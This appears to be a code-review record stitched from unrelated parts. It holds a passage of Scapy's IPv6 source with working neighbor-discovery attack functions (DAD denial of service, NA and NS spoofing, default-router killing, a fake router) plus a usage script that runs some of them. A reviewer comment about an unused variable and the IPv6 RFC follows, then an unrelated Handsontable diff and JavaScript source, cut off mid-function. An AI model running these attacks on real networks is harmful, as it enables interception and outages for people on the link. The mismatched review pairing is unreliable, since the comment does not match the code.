conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. """ def na_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS with a NA """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None, router=False): """ The main purpose of this function is to send fake Neighbor Advertisement messages to a victim. As the emission of unsolicited Neighbor Advertisement is pretty pointless (from an attacker standpoint) because it will not lead to a modification of a victim's neighbor cache, the function send advertisements in response to received NS (NS sent as part of the DAD, i.e. with an unspecified address as source, are not considered). 
By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address - as IPv6 destination address: the source IPv6 address of received NS message. - the mac address of the interface as source (or reply_mac, see below). - the source mac address of the received NS as destination macs address of the emitted NA. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. router: by the default (False) the 'R' flag in the NA used for the reply is not set. If the parameter is set to True, the 'R' flag in the NA is set, advertising us as a router. Please, keep the following in mind when using the function: for obvious reasons (kernel space vs. Python speed), when the target of the address resolution is on the link, the sender of the NS receives 2 NA messages in a row, the valid one and our fake one. The second one will overwrite the information provided by the first one, i.e. the natural latency of Scapy helps here. In practice, on a common Ethernet link, the emission of the NA from the genuine target (kernel stack) usually occurs in the same millisecond as the receipt of the NS. The NA generated by Scapy6 will usually come after something 20+ ms. On a usual testbed for instance, this difference is sufficient to have the first data packet sent from the victim to the destination before it even receives our fake NA. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must NOT be the unspecified address if req[IPv6].src == "::": return 0 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 dst = req[IPv6].dst if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. # If this is a real address resolution NS, then the destination # address of the packet is the link-local solicited node multicast # address associated with the target of the NS. # Otherwise, the NS is a NUD related one, i.e. 
the peer is # unicasting the NS to check the target is still alive (L2 # information is still in its cache and it is verified) received_snma = inet_pton(socket.AF_INET6, dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: print("solicited node multicast @ does not match target @!") return 0 return 1 def reply_callback(req, reply_mac, router, iface): """ Callback that reply to a NS with a spoofed NA """ # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and # send it back. mac = req[Ether].src pkt = req[IPv6] src = pkt.src tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) # Use the target field from the NS rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 # "If the solicitation IP Destination Address is not a multicast # address, the Target Link-Layer Address option MAY be omitted" # Given our purpose, we always include it. rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac router = (router and 1) or 0 # Value of the R flags in NA sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, router, iface), iface=iface) def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", dst=None, src_mac=None, dst_mac=None, loop=True, inter=1, iface=None): """ The main purpose of this function is to send fake Neighbor Solicitations messages to a victim, in order to either create a new entry in its neighbor cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the entry or update an existing one (if it is not currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 state is set to STALE. The two main parameters of the function are the source link-layer address (carried by the Source Link-Layer Address option in the NS) and the source address of the packet. Unlike some other NDP_Attack_* function, this one is not based on a stimulus/response model. When called, it sends the same NS packet in loop every second (the default) Following arguments can be used to change the format of the packets: src_lladdr: the MAC address used in the Source Link-Layer Address option included in the NS packet. This is the address that the peer should associate in its neighbor cache with the IPv6 source address of the packet. If None is provided, the mac address of the interface is used. src: the IPv6 address used as source of the packet. If None is provided, an address associated with the emitting interface will be used (based on the destination address of the packet). target: the target address of the NS packet. If no value is provided, a dummy address (2001:db8::1) is used. The value of the target has a direct impact on the destination address of the packet if it is not overridden. By default, the solicited-node multicast address associated with the target is used as destination address of the packet. Consider specifying a specific destination address if you intend to use a target address different than the one of the victim. dst: The destination address of the NS. 
By default, the solicited node multicast address associated with the target address (see previous parameter) is used if no specific value is provided. The victim is not expected to check the destination address of the packet, so using a multicast address like ff02::1 should work if you want the attack to target all hosts on the link. On the contrary, if you want to be more stealth, you should provide the target address for this parameter in order for the packet to be sent only to the victim. src_mac: the MAC address used as source of the packet. By default, this is the address of the interface. If you want to be more stealth, feel free to use something else. Note that this address is not the that the victim will use to populate its neighbor cache. dst_mac: The MAC address used as destination address of the packet. If the IPv6 destination address is multicast (all-nodes, solicited node, ...), it will be computed. If the destination address is unicast, a neighbor solicitation will be performed to get the associated address. If you want the attack to be stealth, you can provide the MAC address using this parameter. loop: By default, this parameter is True, indicating that NS packets will be sent in loop, separated by 'inter' seconds (see below). When set to False, a single packet is sent. inter: When loop parameter is True (the default), this parameter provides the interval in seconds used for sending NS packets. iface: to force the sending interface. """ if not iface: iface = conf.iface # Use provided MAC address as source link-layer address option # or the MAC address of the interface if none is provided. if not src_lladdr: src_lladdr = get_if_hwaddr(iface) # Prepare packets parameters ether_params = {} if src_mac: ether_params["src"] = src_mac if dst_mac: ether_params["dst"] = dst_mac ipv6_params = {} if src: ipv6_params["src"] = src if dst: ipv6_params["dst"] = dst else: # Compute the solicited-node multicast address # associated with the target address. tmp = inet_ntop(socket.AF_INET6, in6_getnsma(inet_pton(socket.AF_INET6, target))) ipv6_params["dst"] = tmp pkt = Ether(**ether_params) pkt /= IPv6(**ipv6_params) pkt /= ICMPv6ND_NS(tgt=target) pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, ip_src_filter=None, reply_mac=None, tgt_mac=None): """ The purpose of the function is to monitor incoming RA messages sent by default routers (RA with a non-zero Router Lifetime values) and invalidate them by immediately replying with fake RA messages advertising a zero Router Lifetime value. The result on receivers is that the router is immediately invalidated, i.e. the associated entry is discarded from the default router list and destination cache is updated to reflect the change. By default, the function considers all RA messages with a non-zero Router Lifetime value but provides configuration knobs to allow filtering RA sent by specific routers (Ethernet source address). With regard to emission, the multicast all-nodes address is used by default but a specific target can be used, in order for the DoS to apply only to a specific host. More precisely, following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RA messages received from this source will trigger replies. 
If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific mac address. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RA messages received from this source address will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific IPv6 source address. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. tgt_mac: allow limiting the effect of the DoS to a specific host, by sending the "invalidating RA" only to its mac address. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 # Check if this is an advertisement for a Default Router # by looking at Router Lifetime value if req[ICMPv6ND_RA].routerlifetime == 0: return 0 return 1 def ra_reply_callback(req, reply_mac, tgt_mac, iface): """ Callback that sends an RA with a 0 lifetime """ # Let's build a reply and send it src = req[IPv6].src # Prepare packets parameters ether_params = {} if reply_mac: ether_params["src"] = reply_mac if tgt_mac: ether_params["dst"] = tgt_mac # Basis of fake RA (high pref, zero lifetime) rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) # Add it a PIO from the request ... tmp = req while ICMPv6NDOptPrefixInfo in tmp: pio = tmp[ICMPv6NDOptPrefixInfo] tmp = pio.payload del(pio.payload) rep /= pio # ... and source link layer address option if ICMPv6NDOptSrcLLAddr in req: mac = req[ICMPv6NDOptSrcLLAddr].lladdr else: mac = req[Ether].src rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) sendp(rep, iface=iface, verbose=0) print("Fake RA sent with source address %s" % src) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), iface=iface) def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, ip_src_filter=None): """ The purpose of this function is to send provided RA message at layer 2 (i.e. providing a packet starting with IPv6 will not work) in response to received RS messages. In the end, the function is a simple wrapper around sendp() that monitor the link for RS messages. It is probably better explained with an example: >>> ra = Ether()/IPv6()/ICMPv6ND_RA() >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") >>> NDP_Attack_Fake_Router(ra, iface="eth0") Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae ... Following arguments can be used to change the behavior: ra: the RA message to send in response to received RS message. iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. 
If none is provided, conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RS messages received from this source will trigger a reply. Note that no changes to provided RA is done which imply that if you intend to target only the source of the RS using this option, you will have to set the Ethernet destination address to the same value in your RA. The default value for this parameter is None: no filtering on the source of RS is done. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RS messages received from this source address will trigger replies. Same comment as for previous argument apply: if you use the option, you will probably want to set a specific Ethernet destination address in the RA. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 return 1 def ra_reply_callback(req, iface): """ Callback that sends an RA in reply to an RS """ src = req[IPv6].src sendp(ra, iface=iface, verbose=0) print("Fake RA sent in response to RS from %s" % src) if not iface: iface = conf.iface sniff_filter = "icmp6" sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, iface), iface=iface) ############################################################################# # Pre-load classes ## ############################################################################# def _get_cls(name): return globals().get(name, Raw) def _load_dict(d): for k, v in d.items(): d[k] = _get_cls(v) _load_dict(icmp6ndoptscls) _load_dict(icmp6typescls) _load_dict(ipv6nhcls) ############################################################################# ############################################################################# # Layers binding # ############################################################################# ############################################################################# conf.l3types.register(ETH_P_IPV6, IPv6) conf.l2types.register(31, IPv6) conf.l2types.register(DLT_IPV6, IPv6) conf.l2types.register(DLT_RAW, _IPv46) conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46) bind_layers(Ether, IPv6, type=0x86dd) bind_layers(CookedLinux, IPv6, proto=0x86dd) bind_layers(GRE, IPv6, proto=0x86dd) bind_layers(SNAP, IPv6, code=0x86dd) bind_layers(Loopback, IPv6, type=socket.AF_INET6) bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
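The Scapy helpers above are fully described by their docstrings; as a quick orientation for readers of this dump, here is a minimal lab-only usage sketch built only from the signatures shown above. The interface name, addresses, and MAC values are placeholders, running the helpers needs raw-socket privileges, and it is assumed the functions are exported through scapy.all as in current Scapy releases.

# Lab-only sketch: exercise the NDP_Attack_* helpers shown above (placeholder values).
from scapy.all import (Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,
                       ICMPv6NDOptSrcLLAddr, NDP_Attack_NS_Spoofing,
                       NDP_Attack_Fake_Router)

# Send one spoofed NS so the victim caches our link-layer address for the target.
NDP_Attack_NS_Spoofing(src_lladdr="00:11:22:33:44:55",
                       src="2001:db8::1",
                       target="2001:db8::1",
                       dst="fe80::1",        # unicast straight to the victim
                       iface="eth0",
                       loop=False)

# Answer every RS on the link with a crafted RA (same pattern as the docstring example).
ra = Ether() / IPv6() / ICMPv6ND_RA()
ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
NDP_Attack_Fake_Router(ra, iface="eth0")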
1
16,544
It's because of this change. `ss` was unused and it made sense in the program. However, I haven't read the IPv6 RFC, so I'm unsure of what it does.

secdev-scapy
py
@@ -483,6 +483,7 @@ class DataManager { */ addChildAtIndex(parent, index, element) { let childElement = element; + let flattenIndex; if (!childElement) { childElement = this.mockNode();
1
import { rangeEach } from '../../../helpers/number'; import { objectEach } from '../../../helpers/object'; import { arrayEach } from '../../../helpers/array'; /** * Class responsible for making data operations. * * @class * @private */ class DataManager { constructor(nestedRowsPlugin, hotInstance) { /** * Main Handsontable instance reference. * * @type {object} */ this.hot = hotInstance; /** * Reference to the source data object. * * @type {Handsontable.CellValue[][]|Handsontable.RowObject[]} */ this.data = null; /** * Reference to the NestedRows plugin. * * @type {object} */ this.plugin = nestedRowsPlugin; /** * Map of row object parents. * * @type {WeakMap} */ this.parentReference = new WeakMap(); /** * Nested structure cache. * * @type {object} */ this.cache = { levels: [], levelCount: 0, rows: [], nodeInfo: new WeakMap() }; } /** * Set the data for the manager. * * @param {Handsontable.CellValue[][]|Handsontable.RowObject[]} data Data for the manager. */ setData(data) { this.data = data; } /** * Get the data cached in the manager. * * @returns {Handsontable.CellValue[][]|Handsontable.RowObject[]} */ getData() { return this.data; } /** * Load the "raw" source data, without NestedRows' modifications. * * @returns {Handsontable.CellValue[][]|Handsontable.RowObject[]} */ getRawSourceData() { let rawSourceData = null; this.plugin.disableCoreAPIModifiers(); rawSourceData = this.hot.getSourceData(); this.plugin.enableCoreAPIModifiers(); return rawSourceData; } /** * Update the Data Manager with new data and refresh cache. * * @param {Handsontable.CellValue[][]|Handsontable.RowObject[]} data Data for the manager. */ updateWithData(data) { this.setData(data); this.rewriteCache(); } /** * Rewrite the nested structure cache. * * @private */ rewriteCache() { this.cache = { levels: [], levelCount: 0, rows: [], nodeInfo: new WeakMap() }; rangeEach(0, this.data.length - 1, (i) => { this.cacheNode(this.data[i], 0, null); }); } /** * Cache a data node. * * @private * @param {object} node Node to cache. * @param {number} level Level of the node. * @param {object} parent Parent of the node. */ cacheNode(node, level, parent) { if (!this.cache.levels[level]) { this.cache.levels[level] = []; this.cache.levelCount += 1; } this.cache.levels[level].push(node); this.cache.rows.push(node); this.cache.nodeInfo.set(node, { parent, row: this.cache.rows.length - 1, level }); if (this.hasChildren(node)) { arrayEach(node.__children, (elem) => { this.cacheNode(elem, level + 1, node); }); } } /** * Get the date for the provided visual row number. * * @param {number} row Row index. * @returns {object} */ getDataObject(row) { return row === null || row === void 0 ? null : this.cache.rows[row]; } /** * Read the row tree in search for a specific row index or row object. * * @private * @param {object} parent The initial parent object. * @param {number} readCount Number of read nodes. * @param {number} neededIndex The row index we search for. * @param {object} neededObject The row object we search for. 
* @returns {number|object} */ readTreeNodes(parent, readCount, neededIndex, neededObject) { let rootLevel = false; let readNodesCount = readCount; if (isNaN(readNodesCount) && readNodesCount.end) { return readNodesCount; } let parentObj = parent; if (!parentObj) { parentObj = { __children: this.data }; rootLevel = true; readNodesCount -= 1; } if (neededIndex !== null && neededIndex !== void 0 && readNodesCount === neededIndex) { return { result: parentObj, end: true }; } if (neededObject !== null && neededObject !== void 0 && parentObj === neededObject) { return { result: readNodesCount, end: true }; } readNodesCount += 1; if (parentObj.__children) { arrayEach(parentObj.__children, (val) => { this.parentReference.set(val, rootLevel ? null : parentObj); readNodesCount = this.readTreeNodes(val, readNodesCount, neededIndex, neededObject); if (isNaN(readNodesCount) && readNodesCount.end) { return false; } }); } return readNodesCount; } /** * Mock a parent node. * * @private * @returns {*} */ mockParent() { const fakeParent = this.mockNode(); fakeParent.__children = this.data; return fakeParent; } /** * Mock a data node. * * @private * @returns {{}} */ mockNode() { const fakeNode = {}; objectEach(this.data[0], (val, key) => { fakeNode[key] = null; }); return fakeNode; } /** * Get the row index for the provided row object. * * @param {object} rowObj The row object. * @returns {number} Row index. */ getRowIndex(rowObj) { return rowObj === null || rowObj === void 0 ? null : this.cache.nodeInfo.get(rowObj).row; } /** * Get the index of the provided row index/row object within its parent. * * @param {number|object} row Row index / row object. * @returns {number} */ getRowIndexWithinParent(row) { let rowObj = null; if (isNaN(row)) { rowObj = row; } else { rowObj = this.getDataObject(row); } const parent = this.getRowParent(row); if (parent === null || parent === void 0) { return this.data.indexOf(rowObj); } return parent.__children.indexOf(rowObj); } /** * Count all rows (including all parents and children). * * @returns {number} */ countAllRows() { const rootNodeMock = { __children: this.data }; return this.countChildren(rootNodeMock); } /** * Count children of the provided parent. * * @param {object|number} parent Parent node. * @returns {number} Children count. */ countChildren(parent) { let rowCount = 0; let parentNode = parent; if (!isNaN(parentNode)) { parentNode = this.getDataObject(parentNode); } if (!parentNode || !parentNode.__children) { return 0; } arrayEach(parentNode.__children, (elem) => { rowCount += 1; if (elem.__children) { rowCount += this.countChildren(elem); } }); return rowCount; } /** * Get the parent of the row at the provided index. * * @param {number|object} row Physical row index. * @returns {object} */ getRowParent(row) { let rowObject; if (isNaN(row)) { rowObject = row; } else { rowObject = this.getDataObject(row); } return this.getRowObjectParent(rowObject); } /** * Get the parent of the provided row object. * * @private * @param {object} rowObject The row object (tree node). * @returns {object|null} */ getRowObjectParent(rowObject) { if (!rowObject || typeof rowObject !== 'object') { return null; } return this.cache.nodeInfo.get(rowObject).parent; } /** * Get the nesting level for the row with the provided row index. * * @param {number} row Row index. * @returns {number|null} Row level or null, when row doesn't exist. */ getRowLevel(row) { let rowObject = null; if (isNaN(row)) { rowObject = row; } else { rowObject = this.getDataObject(row); } return rowObject ? 
this.getRowObjectLevel(rowObject) : null; } /** * Get the nesting level for the row with the provided row index. * * @private * @param {object} rowObject Row object. * @returns {number} Row level. */ getRowObjectLevel(rowObject) { return rowObject === null || rowObject === void 0 ? null : this.cache.nodeInfo.get(rowObject).level; } /** * Check if the provided row/row element has children. * * @param {number|object} row Row number or row element. * @returns {boolean} */ hasChildren(row) { let rowObj = row; if (!isNaN(rowObj)) { rowObj = this.getDataObject(rowObj); } return !!(rowObj.__children && rowObj.__children.length); } /** * Returns `true` if the row at the provided index has a parent. * * @param {number} index Row index. * @returns {boolean} `true` if the row at the provided index has a parent, `false` otherwise. */ isChild(index) { return this.getRowParent(index) !== null; } /** * Get child at a provided index from the parent element. * * @param {object} parent The parent row object. * @param {number} index Index of the child element to be retrieved. * @returns {object|null} The child element or `null` if the child doesn't exist. */ getChild(parent, index) { return parent.__children?.[index] || null; } /** * Return `true` of the row at the provided index is located at the topmost level. * * @param {number} index Row index. * @returns {boolean} `true` of the row at the provided index is located at the topmost level, `false` otherwise. */ isRowHighestLevel(index) { return !this.isChild(index); } /** * Return `true` if the provided row index / row object represents a parent in the nested structure. * * @param {number|object} row Row index / row object. * @returns {boolean} `true` if the row is a parent, `false` otherwise. */ isParent(row) { let rowObj = row; if (!isNaN(rowObj)) { rowObj = this.getDataObject(rowObj); } return rowObj && (!!rowObj.__children && rowObj.__children?.length !== 0); } /** * Add a child to the provided parent. It's optional to add a row object as the "element". * * @param {object} parent The parent row object. * @param {object} [element] The element to add as a child. */ addChild(parent, element) { let childElement = element; this.hot.runHooks('beforeAddChild', parent, childElement); let parentIndex = null; if (parent) { parentIndex = this.getRowIndex(parent); } this.hot.runHooks('beforeCreateRow', parentIndex + this.countChildren(parent) + 1, 1); let functionalParent = parent; if (!parent) { functionalParent = this.mockParent(); } if (!functionalParent.__children) { functionalParent.__children = []; } if (!childElement) { childElement = this.mockNode(); } functionalParent.__children.push(childElement); this.rewriteCache(); const newRowIndex = this.getRowIndex(childElement); this.hot.rowIndexMapper.insertIndexes(newRowIndex, 1); this.hot.runHooks('afterCreateRow', newRowIndex, 1); this.hot.runHooks('afterAddChild', parent, childElement); } /** * Add a child node to the provided parent at a specified index. * * @param {object} parent Parent node. * @param {number} index Index to insert the child element at. * @param {object} [element] Element (node) to insert. 
*/ addChildAtIndex(parent, index, element) { let childElement = element; if (!childElement) { childElement = this.mockNode(); } this.hot.runHooks('beforeAddChild', parent, childElement, index); if (parent) { const parentIndex = this.getRowIndex(parent); const finalChildIndex = parentIndex + index + 1; this.hot.runHooks('beforeCreateRow', finalChildIndex, 1); parent.__children.splice(index, null, childElement); this.rewriteCache(); this.plugin.disableCoreAPIModifiers(); this.hot.setSourceDataAtCell( this.getRowIndexWithinParent(parent), '__children', parent.__children, 'NestedRows.addChildAtIndex' ); this.hot.rowIndexMapper.insertIndexes(finalChildIndex, 1); this.plugin.enableCoreAPIModifiers(); this.hot.runHooks('afterCreateRow', finalChildIndex, 1); } else { this.plugin.disableCoreAPIModifiers(); this.hot.alter('insert_row', index, 1, 'NestedRows.addChildAtIndex'); this.plugin.enableCoreAPIModifiers(); } // Workaround for refreshing cache losing the reference to the mocked row. childElement = this.getDataObject(index); this.hot.runHooks('afterAddChild', parent, childElement, index); } /** * Add a sibling element at the specified index. * * @param {number} index New element sibling's index. * @param {('above'|'below')} where Direction in which the sibling is to be created. */ addSibling(index, where = 'below') { const translatedIndex = this.translateTrimmedRow(index); const parent = this.getRowParent(translatedIndex); const indexWithinParent = this.getRowIndexWithinParent(translatedIndex); switch (where) { case 'below': this.addChildAtIndex(parent, indexWithinParent + 1, null); break; case 'above': this.addChildAtIndex(parent, indexWithinParent, null); break; default: break; } } /** * Detach the provided element from its parent and add it right after it. * * @param {object|Array} elements Row object or an array of selected coordinates. * @param {boolean} [forceRender=true] If true (default), it triggers render after finished. 
*/ detachFromParent(elements, forceRender = true) { let element = null; const rowObjects = []; if (Array.isArray(elements)) { rangeEach(elements[0], elements[2], (i) => { const translatedIndex = this.translateTrimmedRow(i); rowObjects.push(this.getDataObject(translatedIndex)); }); rangeEach(0, rowObjects.length - 2, (i) => { this.detachFromParent(rowObjects[i], false); }); element = rowObjects[rowObjects.length - 1]; } else { element = elements; } const childRowIndex = this.getRowIndex(element); const childCount = this.countChildren(element); const indexWithinParent = this.getRowIndexWithinParent(element); const parent = this.getRowParent(element); const grandparent = this.getRowParent(parent); const grandparentRowIndex = this.getRowIndex(grandparent); let movedElementRowIndex = null; this.hot.runHooks('beforeDetachChild', parent, element); if (indexWithinParent !== null && indexWithinParent !== void 0) { const removedRowIndexes = Array.from( new Array(childRowIndex + childCount + 1).keys() ).splice(-1 * (childCount + 1)); this.hot.runHooks( 'beforeRemoveRow', childRowIndex, childCount + 1, removedRowIndexes, this.plugin.pluginName ); parent.__children.splice(indexWithinParent, 1); this.rewriteCache(); this.hot.runHooks( 'afterRemoveRow', childRowIndex, childCount + 1, removedRowIndexes, this.plugin.pluginName ); if (grandparent) { movedElementRowIndex = grandparentRowIndex + this.countChildren(grandparent); const lastGrandparentChild = this.getChild(grandparent, this.countChildren(grandparent) - 1); const lastGrandparentChildIndex = this.getRowIndex(lastGrandparentChild); this.hot.runHooks('beforeCreateRow', lastGrandparentChildIndex + 1, childCount + 1, this.plugin.pluginName); grandparent.__children.push(element); } else { movedElementRowIndex = this.hot.countRows() + 1; this.hot.runHooks('beforeCreateRow', movedElementRowIndex - 2, childCount + 1, this.plugin.pluginName); this.data.push(element); } } this.rewriteCache(); this.hot.runHooks('afterCreateRow', movedElementRowIndex - 2, childCount + 1, this.plugin.pluginName); this.hot.runHooks('afterDetachChild', parent, element, this.getRowIndex(element)); if (forceRender) { this.hot.render(); } } /** * Filter the data by the `logicRows` array. * * @private * @param {number} index Index of the first row to remove. * @param {number} amount Number of elements to remove. * @param {Array} logicRows Array of indexes to remove. */ filterData(index, amount, logicRows) { // TODO: why are the first 2 arguments not used? const elementsToRemove = []; arrayEach(logicRows, (elem) => { elementsToRemove.push(this.getDataObject(elem)); }); arrayEach(elementsToRemove, (elem) => { const indexWithinParent = this.getRowIndexWithinParent(elem); const tempParent = this.getRowParent(elem); if (tempParent === null) { this.data.splice(indexWithinParent, 1); } else { tempParent.__children.splice(indexWithinParent, 1); } }); this.rewriteCache(); } /** * Used to splice the source data. Needed to properly modify the nested structure, which wouldn't work with the * default script. * * @private * @param {number} index Physical index of the element at the splice beginning. * @param {number} amount Number of elements to be removed. * @param {object[]} elements Array of row objects to add. 
*/ spliceData(index, amount, elements) { const previousElement = this.getDataObject(index - 1); let newRowParent = null; let indexWithinParent = index; if (previousElement && previousElement.__children && previousElement.__children.length === 0) { newRowParent = previousElement; indexWithinParent = 0; } else if (index < this.countAllRows()) { newRowParent = this.getRowParent(index); indexWithinParent = this.getRowIndexWithinParent(index); } if (newRowParent) { if (elements) { newRowParent.__children.splice(indexWithinParent, amount, ...elements); } else { newRowParent.__children.splice(indexWithinParent, amount); } } else if (elements) { this.data.splice(indexWithinParent, amount, ...elements); } else { this.data.splice(indexWithinParent, amount); } this.rewriteCache(); } /** * Update the `__children` key of the upmost parent of the provided row object. * * @private * @param {object} rowElement Row object. */ syncRowWithRawSource(rowElement) { let upmostParent = rowElement; let tempParent = null; do { tempParent = this.getRowParent(tempParent); if (tempParent !== null) { upmostParent = tempParent; } } while (tempParent !== null); this.plugin.disableCoreAPIModifiers(); this.hot.setSourceDataAtCell( this.getRowIndex(upmostParent), '__children', upmostParent.__children, 'NestedRows.syncRowWithRawSource', ); this.plugin.enableCoreAPIModifiers(); } /* eslint-disable jsdoc/require-param */ /** * Move a single row. * * @param {number} fromIndex Index of the row to be moved. * @param {number} toIndex Index of the destination. * @param {boolean} moveToCollapsed `true` if moving a row to a collapsed parent. * @param {boolean} moveToLastChild `true` if moving a row to be a last child of the new parent. */ /* eslint-enable jsdoc/require-param */ moveRow(fromIndex, toIndex, moveToCollapsed, moveToLastChild) { const moveToLastRow = toIndex === this.hot.countRows(); const fromParent = this.getRowParent(fromIndex); const indexInFromParent = this.getRowIndexWithinParent(fromIndex); const elemToMove = fromParent.__children.slice(indexInFromParent, indexInFromParent + 1); const movingUp = fromIndex > toIndex; let toParent = moveToLastRow ? this.getRowParent(toIndex - 1) : this.getRowParent(toIndex); if (toParent === null || toParent === void 0) { toParent = this.getRowParent(toIndex - 1); } if (toParent === null || toParent === void 0) { toParent = this.getDataObject(toIndex - 1); } if (!toParent) { toParent = this.getDataObject(toIndex); toParent.__children = []; } else if (!toParent.__children) { toParent.__children = []; } const indexInTargetParent = moveToLastRow || moveToCollapsed || moveToLastChild ? toParent.__children.length : this.getRowIndexWithinParent(toIndex); const sameParent = fromParent === toParent; toParent.__children.splice(indexInTargetParent, 0, elemToMove[0]); fromParent.__children.splice(indexInFromParent + (movingUp && sameParent ? 1 : 0), 1); // Sync the changes in the cached data with the actual 